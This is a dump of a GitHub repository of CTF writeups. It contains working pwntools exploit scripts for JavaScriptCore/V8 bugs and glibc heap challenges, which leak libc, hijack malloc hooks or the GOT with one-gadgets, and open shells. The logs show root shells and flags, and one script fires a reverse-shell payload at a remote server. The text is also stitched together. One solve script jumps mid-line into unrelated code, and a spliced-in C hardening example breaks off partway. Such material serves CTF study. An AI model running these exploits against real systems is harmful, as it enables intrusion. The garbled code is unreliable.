@@ -1636,4 +1636,4 @@ 34 | globalObject->arraySpeciesWatchpoint().fireAll(vm, lazyDetail); 35 | } 36 | 37 | -} // namespace JSC 38 | +} // namespace JSC 39 | 40 | ``` 41 | 42 | If you have read saelo 's phrack article (http://www.phrack.org/papers/attacking_javascript_engines.html), you will spot it instantly it is CVE-2016-4622, just go to the phrack article and the git repo (https://github.com/saelo/jscpwn) get the PoC , change the size from 4 to 100 , and set it to return [4] instead of [3] 43 | 44 | Embed the addrof and fakeobj to 35c3 webkid 's exploit (https://github.com/saelo/35c3ctf/tree/master/WebKid), change shellcode in order to make it works on linux. 45 | 46 | For details, please refer to CVE-2016-4622 and 35c3 webkid 47 | 48 | I can get the shell locally but I tried more than 200 times send the payload to remote service and get the flag in one of the attempt, not sure with the reason. 49 | 50 | 51 | ![alt text](flag.png) 52 | -------------------------------------------------------------------------------- /browser/Codegate_CTF_2019_Preliminary_Butterfree/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ans = open('reverse_shell.js').read() 4 | while True: 5 | r= remote('110.10.147.110', 17423) 6 | # r = process('./jsc') 7 | # pause() 8 | r.sendline(ans) 9 | sleep(0.3) 10 | # sleep(2) 11 | try: 12 | r.sendline('ls -al ') 13 | r.recv() 14 | r.interactive() 15 | except EOFError: 16 | r.close() 17 | r.close() 18 | 19 | 20 | ''' 21 | [*] Interrupted 22 | [+] Opening connection to 110.10.147.110 on port 17423: Done 23 | [*] Switching to interactive mode 24 | [*] Got EOF while reading in interactive 25 | $ 26 | [*] Interrupted 27 | [+] Opening connection to 110.10.147.110 on port 17423: Done 28 | [*] Switching to interactive mode 29 | total 268 30 | drwxr-xr-x 1 root guest 4096 Jan 26 10:27 . 31 | drw-r----x 1 root root 4096 Jan 26 10:22 .. 
32 | -rw-r----- 1 root guest 39 Jan 26 08:50 flag 33 | -rwxr-x--- 1 root guest 258904 Jan 14 16:59 jsc 34 | $ cat flag 35 | flag{4240a8444fe8734044fca90700b3ade2} 36 | [*] Got EOF while reading in interactive 37 | ''' 38 | 39 | -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/1.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/2.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/3.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/4.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/5.png -------------------------------------------------------------------------------- 
/browser/PlaidCTF_2018_Roll-a-d8/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/6.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/7.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/8.png -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/d8_d97a796c6c189bbb350942ea5d92f4dd.tar.xz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/PlaidCTF_2018_Roll-a-d8/d8_d97a796c6c189bbb350942ea5d92f4dd.tar.xz -------------------------------------------------------------------------------- /browser/PlaidCTF_2018_Roll-a-d8/readme.md: -------------------------------------------------------------------------------- 1 | # PlaidCTF 2018 Roll-a-d8 2 | 3 | From the question : 4 | 5 | ``` 6 | This might only be helpful to Google employees... or is it? 
https://crbug.com/821137 7 | ``` 8 | 9 | We can search for the regression test under v8 's repo, but we need to slightly modify the test before really can trigger crashes 10 | 11 | You have to modify the maxsize (increase) before triggering the crash on the d8 engine with the regression test 12 | 13 | After triggering the bug , we can leak the address of the array buffer with the help of the oobArray : 14 | ![alt text](1.png) 15 | 16 | The buffer address is highlighted in red,while yellow box if pointed to oobArray : 17 | ![alt text](2.png) 18 | 19 | We can leak the jit address by place it inside a {}, since object inside would be align each other within the memory region 20 | 21 | ![alt text](3.png) 22 | 23 | check under vmmap, we can see what we got is not within the rwx jit region: 24 | 25 | ![alt text](4.png) 26 | 27 | Locate to it, we saw there is a pointer belongs to the rwx region (red box): 28 | 29 | ![alt text](5.png) 30 | 31 | Locate that pointer , we saw something looks like instructions (red box): 32 | 33 | ![alt text](6.png) 34 | 35 | We can trigger sigtrap by overwriting it with 0xcc: 36 | 37 | ![alt text](7.png) 38 | 39 | 40 | Poped a xcalc :) 41 | ![alt text](8.png) 42 | 43 | 44 | # Reference and other exploits 45 | 46 | 1. https://pastebin.com/gtJA92j8 47 | 48 | 2. https://gist.github.com/sroettger/d077d3907999aaa0f89d11d956b438ea 49 | 50 | 3. https://gist.github.com/saelo/52985fe415ca576c94fc3f1975dbe837 51 | 52 | 4. 
https://gist.github.com/itszn/73cc299b9bcff1ed585e6206d1ade58e 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /browser/RealWorldCTF_2019_Accessible/accessible.zip.001: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/RealWorldCTF_2019_Accessible/accessible.zip.001 -------------------------------------------------------------------------------- /browser/RealWorldCTF_2019_Accessible/accessible.zip.002: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/RealWorldCTF_2019_Accessible/accessible.zip.002 -------------------------------------------------------------------------------- /browser/RealWorldCTF_2019_Accessible/accessible.zip.003: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/RealWorldCTF_2019_Accessible/accessible.zip.003 -------------------------------------------------------------------------------- /fuzzer.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import random 3 | 4 | target_num=206847083506555800000 5 | offset=97*111*116 6 | #aot 7 | #dnyiicr 8 | #iycidrn 9 | #cirdyniaot 10 | #cinrinn 11 | #*98*100*110*119*97 12 | #ao 13 | goal=target_num/offset 14 | 15 | test='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' 16 | ##ilnxKM 17 | ##ord 12679cdt%ay 18 | #anagram dictionary 19 | #http://samueltang.net/myonnineribble/stagefive-5880bb3cc95edcf2c43e70ad4b1bdf895cdc62bd/dictionary.php 20 | length=len(test) 21 | 22 | def randstring(length=7): 23 | valid_letters='abcdefghijklmnopqrstuvwxyz' 24 | return 
''.join((random.choice(valid_letters) for i in xrange(length))) 25 | 26 | 27 | def ordd(strr): 28 | length=len(strr) 29 | check_sum=1 30 | for i in range(length): 31 | check_sum=check_sum*ord(strr[i]) 32 | return check_sum 33 | ok=0 34 | string=[] 35 | solution=0 36 | while(solution!=10): 37 | temp=randstring() 38 | #print temp 39 | if(ordd(temp)==goal): 40 | print str(aot+temp) 41 | ok=1 42 | solution+=1 43 | 44 | 45 | -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/1.png -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/2.png -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/babyheap_69a42acd160ab67a68047ca3f9c390b9: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/babyheap_69a42acd160ab67a68047ca3f9c390b9 -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/libc-2.23.so -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/libc.so.6_b86ec517ee44b2d6c03096e0518c72a1: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/0CTF_2017_babyheap/libc.so.6_b86ec517ee44b2d6c03096e0518c72a1 -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/readme.md: -------------------------------------------------------------------------------- 1 | # 0CTF 2017 Babyheap 2 | 3 | # Logs 4 | 5 | ```Python 6 | [+] Starting local process './babyheap_69a42acd160ab67a68047ca3f9c390b9': pid 210 7 | [*] '/home/work/0ctf_2017/babyheap/libc-2.23.so' 8 | Arch: amd64-64-little 9 | RELRO: Partial RELRO 10 | Stack: Canary found 11 | NX: NX enabled 12 | PIE: PIE enabled 13 | [*] Paused (press any to continue) 14 | [*] Paused (press any to continue) 15 | [*] leaking libc 16 | x\xbb\x93\x8dr\x7f\x00\x00x\xbb\x93\x8dr\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 17 | 18 | leaked : 0x7f728d93bb78 19 | libc base = 0x7f728d577000 20 | realloc_hook = 0x7f728d93bb08 21 | malloc_hook = 0x7f728d93bb10 22 | onegadget 0x7f728d5bc26a 23 | fake chunk : 0x7f728d93baed 24 | [*] Paused (press any to continue) 25 | [*] Switching to interactive mode 26 | 1. Allocate 27 | 2. Fill 28 | 3. Free 29 | 4. Dump 30 | 5. Exit 31 | Command: $ 32 | $ 33 | $ id 34 | uid=0(root) gid=0(root) groups=0(root) 35 | $ 36 | 37 | ``` 38 | shifted fake chunk: 39 | 40 | ![alt text](1.png) 41 | 42 | 43 | original position: 44 | 45 | ![alt text](2.png) 46 | 47 | 48 | # Reference 49 | 50 | 1. http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html 51 | 52 | 2. https://github.com/shellphish/how2heap/blob/master/fastbin_dup_into_stack.c 53 | 54 | 3. https://poning.me/2017/03/24/baby-heap-2017/ 55 | 56 | 4. 
http://0x48.pw/2017/08/01/0x36/ 57 | -------------------------------------------------------------------------------- /heap/0CTF_2017_babyheap/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./babyheap_69a42acd160ab67a68047ca3f9c390b9') 4 | #r=process('./babyheap_69a42acd160ab67a68047ca3f9c390b9',env={"LD_PRELOAD": "./libc.so.6_b86ec517ee44b2d6c03096e0518c72a1"}) 5 | #libc = ELF('libc.so.6_b86ec517ee44b2d6c03096e0518c72a1') 6 | libc=ELF("libc-2.23.so") 7 | #gdb.attach(r) 8 | 9 | pause() 10 | def allocate(size): 11 | r.sendline("1") 12 | r.recvuntil(": ") 13 | r.sendline(str(size)) 14 | r.recvuntil(": ") 15 | sleep(1) 16 | 17 | 18 | def fill(num,content): 19 | r.sendline("2") 20 | r.recvuntil(": ") 21 | r.sendline(str(num)) 22 | r.recvuntil(": ") 23 | r.sendline(str(len(content))) 24 | r.recvuntil(": ") 25 | r.sendline(content) 26 | r.recvuntil(": ") 27 | sleep(2) 28 | 29 | def free(num): 30 | r.sendline("3") 31 | r.recvuntil(": ") 32 | r.sendline(str(num)) 33 | r.recvuntil(": ") 34 | sleep(1) 35 | 36 | 37 | allocate(0x20)#0 38 | allocate(0x20)#1 39 | allocate(0x20)#2 40 | allocate(0x20)#3 41 | allocate(0x100)#4 42 | allocate(0x20) 43 | 44 | fill(4,"ZZZZZZZZ") 45 | pause() 46 | 47 | free(0) 48 | free(2) 49 | fill(1,"D"*(0x20+8)+p64(0x31)+"\xc0") 50 | fill(3,"Q"*(0x20+8)+p64(0x31)+("x")*40+p64(0x31)) 51 | 52 | allocate(0x20) 53 | allocate(0x20)# get number 4 chunk but name no2 54 | 55 | fill(3,"Q"*(0x20+8)+p64(0x111)) 56 | free(4) 57 | 58 | log.info("leaking libc") 59 | r.recvuntil(": ") 60 | r.recvuntil(": ") 61 | r.recvuntil(": ") 62 | r.recvuntil(": ") 63 | r.recvuntil(": ") 64 | 65 | r.sendline("4") 66 | r.recvuntil(": ") 67 | r.sendline("2") 68 | r.recvuntil("\n") 69 | leak=r.recvuntil("\n") 70 | print leak 71 | leaked=leak[:6] 72 | leaked=u64(leaked.ljust(8,"\x00")) 73 | print "leaked : "+hex(leaked) 74 | #cloud 75 | libc_base=leaked-3951480 76 | 77 | #local 78 | 
#libc_base=leaked-3771224 79 | 80 | print "libc base = "+hex(libc_base) 81 | realloc_hook=libc_base+libc.symbols['__realloc_hook'] 82 | print "realloc_hook = "+hex(realloc_hook) 83 | malloc_hook=libc_base+libc.symbols['__malloc_hook'] 84 | print "malloc_hook = "+hex(malloc_hook) 85 | #local 86 | #one=libc_base+0x3f32a 87 | 88 | #cloud 89 | one=libc_base+0x4526a 90 | print "onegadget "+hex(one) 91 | 92 | 93 | #exploit 94 | allocate(0x60)#4 95 | allocate(0x60)#6 96 | free(6) 97 | fill(4,"X"*(0x60+8)+p64(0x71)+p64(malloc_hook-35)) 98 | free(1)# to clean up the 0x78 on the main_arena, since it will cause size problem on the heap 99 | 100 | allocate(0x60)#1 101 | allocate(0x60)#6 : 0x0000000001bf3170 0x0000000001bf3170 104 | # 0x6020b0 : 0x0000000001bf3010 0x0000000001bf3220 105 | #3 rd pointer 106 | 107 | 108 | add(0,30,"X") 109 | add(1,800,"T"*300) 110 | add(2,500,"B"*300) 111 | add(3,128,"X") 112 | 113 | free(3) 114 | free(2) 115 | free(1) 116 | free(0) 117 | known_heap=heapbase+0x190 118 | #add(1,900,"Q"*(96)+"P"*(900-112+16)) 119 | pop_rax_ret=0x0000000000035f98+libc_base 120 | print "pop_rax_ret : "+hex(pop_rax_ret) 121 | #add(1,900,"Q"*96+p64(one_gadget)*100) 122 | rop=p64(pop_rax_ret)+p64(system) 123 | #fake heap 124 | # add(1,900,rop+"Q"*(96-len(rop)+48)+p64(known_heap)+p64(heapbase+0x220+32)+p64(0)+p64(0x91)) 125 | 126 | add(1,900,"Q"*(96+48)+p64(one_gadget)) 127 | 128 | print "[+] Get Shell " 129 | r.sendline("3") 130 | r.recvuntil(":") 131 | r.sendline("3") 132 | r.sendline("ls -al") 133 | 134 | 135 | r.interactive() 136 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 auir/auir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 auir/auir -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 auir/libc-2.23.so: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 auir/libc-2.23.so -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 auir/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | # Reference: 6 | 7 | 1. https://github.com/isislab/CSAW-CTF-2017-Quals/tree/master/pwn/auir 8 | 9 | 2. https://ctf-wiki.github.io/ctf-wiki/pwn/heap/fastbin_attack.html 10 | 11 | 3. https://glennmcgui.re/csaw-17-auir/ 12 | 13 | 4. http://blog.isis.poly.edu/2017/09/30/csaw-ctf-2017-auir/ 14 | 15 | 5. https://github.com/ymgve/ctf-writeups/tree/master/csaw2017quals/pwn200-auir 16 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 zone/libc-2.23.so -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r=process('./zone',env={"LD_PRELOAD": "./libc-2.23.so"}) 5 | libc = ELF('libc-2.23.so') 6 | gdb.attach(r) 7 | 8 | def allocate(size): 9 | r.sendline("1") 10 | r.sendline(str(size)) 11 | r.recvuntil("5) Exit\n") 12 | sleep(1) 13 | 14 | 15 | def delete(): 16 | r.sendline("2") 17 | r.recvuntil("5) Exit\n") 18 | sleep(0.5) 19 | 20 | def write(content): 21 | r.sendline("3") 22 | sleep(1) 23 | r.sendline(content) 24 
| r.recvuntil("5) Exit\n") 25 | pause() 26 | r.recvuntil(": ") 27 | env=r.recvuntil("\n") 28 | env=int(env[:-1],16) 29 | print "env :"+hex(env) 30 | put_got=0x0000000000607020 31 | allocate(0x40) 32 | write("A"*0x40+"\x80") 33 | allocate(0x40) 34 | write("B"*0x40) 35 | allocate(0x40) 36 | write("C"*0x40) 37 | delete() 38 | delete() 39 | allocate(0x80) 40 | write("D"*(0x40)+"X"*8) 41 | 42 | #leak libc 43 | r.sendline("4") 44 | r.recvuntil("XXXXXXXX") 45 | leak=r.recvuntil("\n") 46 | print len(leak) 47 | print leak 48 | 49 | leak=leak.ljust(8,"\x00") 50 | leak=hex(u64(leak)) 51 | 52 | leak="0x"+leak[3:] 53 | leak=int(leak,16) 54 | 55 | print "leaked libc :"+hex(leak) 56 | r.recvuntil("5) Exit\n") 57 | 58 | put_lib=leak-5741152 59 | libc_base=put_lib-libc.symbols['puts'] 60 | system=libc_base+libc.symbols['system'] 61 | one=libc_base+0x45216 62 | print "libcbase : "+hex(libc_base) 63 | print "puts : "+hex(put_lib) 64 | print "system : "+hex(system) 65 | print "one : "+hex(one) 66 | delete() 67 | allocate(0x80) 68 | write("D"*(0x40)+"Q"*8+p64(put_got-0x10)+"R"*8+"S"*8) 69 | allocate(0x40) 70 | write("SSSSSSSS") 71 | allocate(0x40) 72 | print "[+] write one gadget" 73 | r.sendline("3") 74 | sleep(1) 75 | r.sendline(p64(one)) 76 | r.sendline("ls -al") 77 | 78 | r.interactive() 79 | 80 | #with write("ZZZZZZZZ") 81 | # env :0x7fffc2f7b540 82 | # 7 83 | 84 | # leaked libc :0x7f67c34370f0 85 | # libcbase : 0x7f67c2e4e000 86 | # puts : 0x7f67c2ebd690 87 | # one : 0x7f67c2e93216 88 | 89 | # 0x607020: 0x00007f67c2ebd690 0x0000000000000000 90 | # 0x607030: 0x5a5a5a5a5a5a5a5a 0x00007f67c2ebde70 91 | # 0x607040: 0x00000000004009e6 0x00007f67c2f45220 92 | # 0x607050: 0x00007f67c2e6e740 0x00007f67c2eb87e0 93 | # 0x607060: 0x0000000000400a26 0x0000000000400a36 94 | # 0x607070: 0x0000000000400a46 0x0000000000400a56 95 | # 0x607080: 0x0000000000400a66 0x0000000000400a76 96 | # 0x607090: 0x0000000000400a86 0x00007f67c2b5b790 97 | # 0x6070a0: 0x0000000000400aa6 0x00007f67c2f4f640 98 | # 
0x6070b0: 0x0000000000000000 0x0000000000000000 99 | # 0x6070c0 : 0x00007f67c3213620 0x0000000000000000 100 | # 0x6070d0: 0x0000000000000000 0x0000000000000000 101 | # 0x6070e0: 0x0000000000000000 0x0000000000000000 102 | # 0x6070f0: 0x0000000000000000 0x0000000000000000 103 | # 0x607100: 0x0000000000000000 0x0000000000000000 104 | # 0x607110: 0x0000000000000000 0x0000000000000000 105 | # 0x607120: 0x0000000000000000 0x0000000000000000 106 | # 0x607130: 0x0000000000000000 0x0000000000000000 107 | # 0x607140: 0x0000000000000000 0x0000000000000000 108 | # 0x607150: 0x0000000000000000 0x0000000000000000 109 | 110 | -------------------------------------------------------------------------------- /heap/CSAW CTF 2017 zone/zone: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/CSAW CTF 2017 zone/zone -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/7ae39f9f3910ac6928dffc35a2b25548: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/7ae39f9f3910ac6928dffc35a2b25548 -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg1.png -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg2.png -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/cg3.png -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/Codegate_CTF_2018_Preliminary/SuperMarimo/libc.so.6 -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/readme.md: -------------------------------------------------------------------------------- 1 | # Super Marimo - 375pts (Pwn) 2 | 3 | 題目: 4 | 5 | 6 | >Super Marimo - 375pts (Pwn) 7 | > 8 | >nc ch41l3ng3s.codegate.kr 3333 9 | > 10 | >[Download](7ae39f9f3910ac6928dffc35a2b25548) 11 | 12 | 13 | 14 | 呢題點解值375, 其實我都晤太明 :/ 15 | 16 | 可能係reverse個部份比較麻煩掛 17 | 18 | 19 | menu: 20 | 21 | ``` 22 | [V]iew my bowls 23 | [B]uy marimo 24 | [S]ell marimo 25 | [A]bout 26 | [Q]uit 27 | >> 28 | 29 | ``` 30 | 31 | 32 | 難點就係佢有個hidden menu, 要你打show me the marimo 先可以add marimo 上去 33 | 34 | 加marimo個陣,首先input maximum 0x10 做name, 0x20做profile 35 | 36 | 加完之後就可以去View到望下隻marimo 37 | 38 | 39 | view : 40 | 41 | ``` 42 | [V]iew my bowls 43 | [B]uy marimo 44 | [S]ell marimo 45 | [A]bout 46 | [Q]uit 47 | >> V 48 | == Marimo's bowl List == 49 | [ bowl 0 ] 50 | Select number or [B]ack 51 | >> 0 52 | birth : 1517739842 53 | current time : 1517739851 54 | size : 10 55 | price : 50 56 | name : AAAA 
57 | profile : BBBB 58 | [M]odify / [B]ack ? 59 | >> 60 | 61 | ``` 62 | 63 | Bug就係呢到,個modifiy冇做bound checking ,搞到可以input >0x20 char 入profile, 引致heap overflow 64 | 65 | 66 | 望下個heapview先 (我已經加左(AAAA,BBBB),(CCCC,DDDD) marimo入去) 67 | 68 | 69 | ![alt text](cg1.png) 70 | 71 | 72 | 73 | 74 | 可以假設佢係類似嘅struct: 75 | 76 | ```C++ 77 | 78 | struct marimo { 79 | char *name; 80 | char *profile; 81 | }; 82 | 83 | 84 | ``` 85 | 86 | overflowed heap: 87 | 88 | ![alt text](cg2.png) 89 | 90 | 91 | 哈 又真係overflow到喎 92 | 93 | 94 | 95 | view 1又會炒 96 | 97 | GDB view: 98 | 99 | 100 | ![alt text](cg3.png) 101 | 102 | 103 | 104 | # Exploit 105 | 106 | 只要我地有一個crafted "valid" heap structure ,fake 到edit 以為 char *profile 個個位支pointer 係一支"valid" pointer,就可以有arbitary write 107 | 108 | 咁可以write邊? puts->one_gadget_rce->get shell 109 | 110 | 111 | solution: [solve.py](solve.py) 112 | 113 | 114 | ``` 115 | [*] Paused (press any to continue) 116 | leaked libcbase =0x7f1cf459c000 117 | leaked malloc =0x7f1cf4620130 118 | leaked one =0x7f1cf45e1216 119 | [*] Switching to interactive mode 120 | $ ls 121 | flag 122 | marimo 123 | $ cat flag 124 | But_every_cat_is_more_cute_than_Marimo 125 | $ 126 | 127 | ``` 128 | -------------------------------------------------------------------------------- /heap/Codegate_CTF_2018_Preliminary/SuperMarimo/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process("./marimo") 4 | host="ch41l3ng3s.codegate.kr" 5 | 6 | port=3333 7 | r = remote(host,port) 8 | libc=ELF("./libc.so.6") 9 | 10 | 11 | #gdb.attach(r) 12 | def add(name,content): 13 | r.sendline("show me the marimo") 14 | r.recvuntil(">> ") 15 | r.sendline(name) 16 | r.recvuntil(">> ") 17 | r.sendline(content) 18 | r.recvuntil(">> ") 19 | sleep(1) 20 | 21 | def edit(number,content): 22 | r.sendline("V") 23 | r.sendline(str(number)) 24 | r.sendline("M") 25 | r.recvuntil(">> ") 26 | r.sendline(content) 27 | r.recvuntil(">> ") 28 | r.sendline("B") 
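The root cause in the Super Marimo writeup above is a modify routine that copies the profile without re-checking the 0x20 limit used at creation. Here is an added example (not part of the writeup or its solve script) that puts a hypothetical reconstruction of that unbounded copy beside a bounded one and shows, in a single-array heap simulation, which of the two disturbs the neighbouring chunk; `modify_profile_unbounded`, `modify_profile_safe`, `overflow_reaches_neighbour` and the constructed inputs are all assumptions, not the challenge binary's code. The solve.py listing continues after it.

```c
#include <stdio.h>
#include <string.h>

/* Limits named in the writeup: name max 0x10, profile max 0x20. */
#define PROFILE_MAX 0x20
/* Bytes kept after the profile to stand in for the neighbouring heap
   chunk (its size field plus the start of its user data). Constructed. */
#define NEIGHBOUR_LEN 0x10
#define NEIGHBOUR_FILL 0x21

/* Vulnerable shape (hypothetical reconstruction of the modify path):
   copies up to the newline with no length check, so a profile longer
   than PROFILE_MAX overwrites whatever follows the chunk. */
int modify_profile_unbounded(char *profile, const char *input) {
    int n = 0;
    while (input[n] != '\0' && input[n] != '\n') {
        profile[n] = input[n];
        n++;
    }
    profile[n] = '\0';
    return n;
}

/* Hardened version: re-apply the creation-time limit, refuse oversized
   input instead of silently truncating, and always NUL-terminate. */
int modify_profile_safe(char *profile, const char *input) {
    size_t len = strcspn(input, "\n");
    if (len >= PROFILE_MAX) {
        return -1;              /* rejected; heap left untouched */
    }
    memcpy(profile, input, len);
    profile[len] = '\0';
    return (int)len;
}

/* Heap simulation: the profile chunk followed immediately by a neighbour
   filled with a known pattern. Returns 1 if the chosen modify routine
   disturbed the neighbour, 0 otherwise. Everything lives in one array,
   so the overrun stays inside it and the demonstration is well-defined. */
int overflow_reaches_neighbour(int use_safe, const char *input) {
    char heap_sim[PROFILE_MAX + NEIGHBOUR_LEN + 1];
    memset(heap_sim, 0, sizeof heap_sim);
    memset(heap_sim + PROFILE_MAX, NEIGHBOUR_FILL, NEIGHBOUR_LEN);

    if (use_safe) {
        modify_profile_safe(heap_sim, input);
    } else {
        modify_profile_unbounded(heap_sim, input);
    }
    for (int i = 0; i < NEIGHBOUR_LEN; i++) {
        if ((unsigned char)heap_sim[PROFILE_MAX + i] != NEIGHBOUR_FILL) {
            return 1;
        }
    }
    return 0;
}

/* Checks the hardened path end to end: 1 if `input` was accepted and the
   stored profile equals `expected`, 0 if it was rejected or differs. */
int safe_modify_matches(const char *input, const char *expected) {
    char profile[PROFILE_MAX];
    if (modify_profile_safe(profile, input) < 0) {
        return 0;
    }
    return strcmp(profile, expected) == 0;
}

/* Constructed oversized input: 0x28 'D's, longer than PROFILE_MAX but
   short enough to stay inside heap_sim. */
const char *oversized_profile(void) {
    static char buf[0x28 + 2];
    memset(buf, 'D', 0x28);
    buf[0x28] = '\n';
    buf[0x28 + 1] = '\0';
    return buf;
}

int main(void) {
    printf("unbounded modify clobbers neighbour: %d\n",
           overflow_reaches_neighbour(0, oversized_profile()));   /* 1 */
    printf("bounded modify clobbers neighbour:   %d\n",
           overflow_reaches_neighbour(1, oversized_profile()));   /* 0 */
    printf("bounded modify keeps short input:    %d\n",
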